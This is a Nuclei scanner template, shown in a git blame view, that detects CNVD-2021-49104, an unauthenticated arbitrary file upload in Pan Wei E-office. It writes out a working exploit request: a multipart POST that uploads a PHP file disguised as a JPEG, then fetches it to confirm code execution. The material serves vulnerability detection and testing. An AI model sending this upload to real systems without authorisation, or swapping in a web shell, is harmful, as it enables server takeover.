nuclei-templates/http/cnvd/2021/CNVD-2021-49104.yaml

49 lines
1.3 KiB
YAML
Raw Normal View History

2022-01-03 09:59:58 +00:00
id: CNVD-2021-49104
info:
2022-01-03 10:15:26 +00:00
name: Pan Micro E-office File Uploads
2022-01-03 09:59:58 +00:00
author: pikpikcu
severity: critical
description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker.
reference:
- https://chowdera.com/2021/12/202112200602130067.html
- http://v10.e-office.cn
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
cvss-score: 9.9
cwe-id: CWE-434
remediation: Pan Wei has released an update to resolve this vulnerability.
2022-09-01 10:51:29 +00:00
tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive
2022-01-03 09:59:58 +00:00
http:
2022-01-03 09:59:58 +00:00
- raw:
- |
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
2022-01-06 10:16:11 +00:00
Host: {{Hostname}}
2022-01-03 09:59:58 +00:00
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
--e64bdf16c554bbc109cecef6451c26a4
2022-01-03 10:15:26 +00:00
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
2022-01-03 09:59:58 +00:00
Content-Type: image/jpeg
<?php echo md5('CNVD-2021-49104');?>
2022-01-03 09:59:58 +00:00
--e64bdf16c554bbc109cecef6451c26a4--
2022-01-03 09:59:58 +00:00
- |
GET /images/logo/logo-eoffice.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
2022-01-03 09:59:58 +00:00
words:
- "94d01a2324ce38a2e29a629c54190f67"
2022-01-03 09:59:58 +00:00
- type: status
status:
- 200
# Enhanced by cs on 2022/02/28